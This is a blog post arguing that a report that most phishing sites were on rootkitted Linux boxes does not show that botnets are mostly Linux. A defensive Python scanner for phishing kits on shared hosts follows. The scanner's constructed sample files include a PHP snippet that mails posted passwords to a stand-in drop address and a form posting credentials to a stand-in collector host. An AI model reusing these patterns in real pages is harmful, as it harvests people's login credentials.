Linux phishing botnet statistics can be deceptive

The Register reports today that eBay's new chief information security officer (CISO) has noted a surprising trend ("eBay: Botnets are Linux-happy"). Specifically, in his previous job as CISO of Washington Mutual, the evidence suggested that the majority of phishing attempts targeting the bank were hosted on Linux systems.

The obvious implication is that there are far more compromised Linux systems in phishing botnets than Windows systems. This is reinforced by eBay CISO Dave Cullinane's comment that "The vast majority of [the phishing sites] we saw were on rootkit-ed Linux boxes, which was rather startling. We expected a predominance of Microsoft boxes and that wasn't the case."

There are some problems with drawing that conclusion from his statement, however:

  1. Each phishing site does not necessarily correspond to a separate machine. The term "phishing site" itself implies Web servers, and the bulk of cheap Web serving is done on shared hosting systems, where a single box may carry hundreds of individual Web sites. A single compromised box can therefore account for hundreds of individual phishing sites, and Linux-based systems are the most commonly employed platforms for shared hosting.
  2. A phishing site does not imply the box was rootkitted. A phishing page planted on a server may mean nothing more than that a vulnerability in one piece of software running there (such as one of the hundreds of notoriously insecure PHP content management systems) has been exploited. That gives the attacker the Web server's privileges and write access to a document root, not necessarily root, and certainly not necessarily a rootkit. Moreover, if Cullinane is really talking about phishing "sites" per se, he's counting server systems and excluding the desktop systems employed as nodes in a botnet.
  3. Phishing botnets that targeted Washington Mutual are by no means the sum total of phishing sites. Even the single most targeted bank in the world is just a small drop in a very large bucket of phishing worldwide. In terms of pure numbers, Washington Mutual's experiences may be statistically significant, but they're also potentially biased: just one or two large botnets could have produced the majority of that traffic, and a single botnet will tend to target a specific platform or a specific (perhaps platform-specific) piece of software rather than attacking everything indiscriminately.
  4. Phishing sites are not the same as botnet nodes. No, really -- this is the biggest problem with the obvious assumptions here. Typically, a phishing botnet sends out e-mails to entice users to a Web site made to look like some other, legitimate Web site. The intent is to trick users into entering important data into the site so that whoever's running it can then engage in identity theft. While it makes sense that the Web sites would be run on shared hosting servers, most of the e-mails are probably being sent out by compromised home systems that are part of a phishing botnet, and those are undoubtedly primarily Windows systems.

I'd be interested in some evidence suggesting, with a bit more validity, that the majority of phishing botnet nodes are Linux boxes, but I'm afraid this doesn't qualify, given the scant information provided by the sensationalistic presentation in today's Register article.

If it's true that Linux boxes host the majority of phishing sites, on the other hand, whether or not those boxes are botnet nodes in any meaningful sense, there's a simple lesson to be drawn from this: If you run a shared hosting provider, check your systems.
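One concrete form of "check your systems" for a shared host, as an added example that is not from the original post or the Register article: a small Python scan over a webroot for the traces a dropped phishing kit tends to leave. The indicators it uses (a credential form whose action posts to another host, PHP that mail()s POSTed fields away, a PHP script sitting in an upload or media directory) are my assumptions about typical kits, and the vhost files it builds under a temporary directory are constructed sample input, not data from either article.

```python
"""Heuristic scan of a shared-hosting webroot for dropped phishing pages.

Added example, not code from the original post. The indicators are
assumptions about what a phishing kit usually leaves behind:
  - an HTML form with a password field whose action posts to another host
  - a PHP file that mail()s POSTed fields to some address
  - a PHP script sitting in an upload/media directory
A hit means "go and look at this customer's site", not "this box is rootkitted".
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# Constructed sample vhost files (not real phishing kits) used for the demo.
SAMPLE_FILES = {
    "vhost1/public_html/index.html": "<html><body>Welcome</body></html>",
    "vhost1/public_html/login.php": (
        "<?php if (isset($_POST['password'])) { "
        "mail('drop@example.net', 'log', $_POST['user'] . ':' . $_POST['password']); } ?>"
        '<form method="post"><input name="user">'
        '<input type="password" name="password"></form>'
    ),
    "vhost2/public_html/wp-content/uploads/2007/04/verify.php": "<?php echo 'ok'; ?>",
    "vhost3/public_html/bank/index.html": (
        '<form action="http://collector.example.org/post.php" method="post">'
        '<input name="acct"><input type="password" name="pin"></form>'
    ),
    "vhost4/public_html/contact.html": (
        '<form action="/contact.php" method="post"><input name="msg"></form>'
    ),
}

FORM_RE = re.compile(r"<form\b[^>]*>.*?</form>", re.I | re.S)
ACTION_RE = re.compile(r"""action\s*=\s*["']?([^"'\s>]+)""", re.I)
PASSWORD_RE = re.compile(r"""type\s*=\s*["']?password""", re.I)
# mail(...) whose arguments include a POSTed value: the classic kit "drop" step.
MAIL_POST_RE = re.compile(r"\bmail\s*\(.*?\$_(POST|REQUEST)\b", re.I | re.S)
# Directories that should hold data, not executable scripts.
UPLOAD_DIR_RE = re.compile(r"/(uploads?|files|media)/", re.I)


def build_sample_webroot():
    """Write the constructed vhost files into a fresh temp dir and return it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def offhost_credential_form(text, own_hosts=()):
    """True if any form containing a password field posts to a host not in own_hosts.

    Relative actions (empty netloc) are treated as same-host and ignored.
    """
    for form in FORM_RE.findall(text):
        if not PASSWORD_RE.search(form):
            continue
        match = ACTION_RE.search(form)
        if not match:
            continue
        host = urlparse(match.group(1)).netloc
        if host and host not in own_hosts:
            return True
    return False


def scan_webroot(root, own_hosts=()):
    """Return sorted (relative_path, indicator) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name.lower().endswith((".php", ".phtml")) and UPLOAD_DIR_RE.search("/" + rel):
                findings.append((rel, "php-in-upload-dir"))
            if MAIL_POST_RE.search(text):
                findings.append((rel, "mails-posted-fields"))
            if offhost_credential_form(text, own_hosts):
                findings.append((rel, "offhost-credential-form"))
    return sorted(findings)


if __name__ == "__main__":
    demo_root = build_sample_webroot()
    for rel, why in scan_webroot(demo_root):
        print(f"{why:24s} {rel}")
```

Point scan_webroot at wherever the provider keeps customer document roots and pass the hostnames those roots legitimately serve as own_hosts, so a customer's own login form posting to its own domain is not flagged. Each hit is a reason to inspect one customer's site and its access logs; it says nothing about whether the underlying box has been rootkitted, which is exactly the distinction item 2 above is making.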

Cullinane made the point that people running systems used as phishing botnet nodes don't know their systems have been compromised. That's very nearly a tautology, of course: the moment a sysadmin knows his or her system has been compromised, he or she typically cleans up the infection, so there are essentially no compromised systems whose sysadmins know they're compromised.

In the case of home users of Windows, it's to be expected that most compromised systems' owners don't know they've been compromised. In the case of shared hosting providers, however, one would hope the sysadmins are paying a little more attention to their networks than that. If shared hosting systems really are being turned into phishing hosts on this scale, it can only mean that incredible numbers of shared hosting provider sysadmins aren't doing their jobs.

Pardon my cynicism but, frankly, I can't say I'm surprised.